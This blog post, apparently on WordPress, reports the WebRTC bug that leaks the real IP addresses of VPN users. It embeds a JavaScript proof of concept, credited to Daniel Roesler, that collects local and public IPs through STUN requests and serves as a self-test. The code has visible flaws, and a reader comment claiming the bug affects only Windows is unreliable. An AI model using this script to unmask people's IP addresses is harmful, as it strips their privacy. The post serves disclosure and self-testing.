WebRTC vulnerability exposes VPN users

It’s now easy to expose the true IP address of VPN users. Daniel Roesler published the an example howto exploit the bug on Github. Firefoz, Mozilla, Chroma and Internet Explorer (with WebRTC plugin) are vulnerable to this bug. WebRtc is used for peer-to-peer connections for video chat and other similar implementations.

If the user isn’t using VPN the computers internal network address will be exposed. This implementation is used for the WebRtc to handle NAT on the network and be able to bind sessions to the public IP. However the bug is really nasty because it exposes these functions to javascript. So this entire implementation below is made with javascript. The request is not registered in the developer console and can not be blocked by plugins.

If the user is using a lightweight VPN client, like a chrome plugin, the VPN will be bypassed all together and both the real public IP and internal NAT address will be shown.

Below there is a demo, if you see your public and private IP your browser is vulnerable for this exploit.

Code cred: Daniel Roesler (I only modified it to run in WordPress).

Your local IP addresses:

    Your public IP addresses:

      //
      [javascript]
      <script>
      function getIPs(){
      var ip_dups = {};
      //compatibility for firefox and chrome
      var RTCPeerConnection = window.RTCPeerConnection
      || window.mozRTCPeerConnection
      || window.webkitRTCPeerConnection;
      var mediaConstraints = {
      optional: [{RtpDataChannels: true}]
      };
      //firefox already has a default stun server in about:config
      // media.peerconnection.default_iceservers =
      // [{"url": "stun:stun.services.mozilla.com"}]
      var servers = undefined;
      //add same stun server for chrome
      if(window.webkitRTCPeerConnection)
      servers = {iceServers: [{urls: "stun:stun.services.mozilla.com"}]};
      //construct a new RTCPeerConnection
      var pc = new RTCPeerConnection(servers, mediaConstraints);
      //listen for candidate events
      pc.onicecandidate = function(ice){
      //skip non-candidate events
      if(ice.candidate){
      //match just the IP address
      var ip_regex = /([0-9]{1,3}(.[0-9]{1,3}){3})/
      var ip_addr = ip_regex.exec(ice.candidate.candidate)[1];
      //remove duplicates
      if(ip_dups[ip_addr] === undefined)
      var li = document.createElement("li");
      li.textContent = ip_addr;
      //local IPs
      if (ip_addr.match(/^(192.168.|169.254.|10.|172.(1[6-9]|2d|3[01]))/))
      document.getElementById("localip").appendChild(li);
      //assume the rest are public IPs
      else
      document.getElementById("publicip").appendChild(li);
      ip_dups[ip_addr] = true;
      }
      };
      //create a bogus data channel
      pc.createDataChannel("");
      //create an offer sdp
      pc.createOffer(function(result){
      //trigger the stun server request
      pc.setLocalDescription(result, function(){}, function(){});
      });
      }
      [/javascript]

      //

      1 Comments on “WebRTC vulnerability exposes VPN users”

      1. The security glitch affects WebRTC-supporting browsers such as Google Chrome and Mozilla Firefox, and appears to be limited to Windows operating system only, although users of Linux and Mac OS X are not affected by this vulnerability.

        Like

      Leave a Reply

      Fill in your details below or click an icon to log in:

      WordPress.com Logo

      You are commenting using your WordPress.com account. Log Out /  Change )

      Google photo

      You are commenting using your Google account. Log Out /  Change )

      Twitter picture

      You are commenting using your Twitter account. Log Out /  Change )

      Facebook photo

      You are commenting using your Facebook account. Log Out /  Change )

      Connecting to %s

      %d bloggers like this: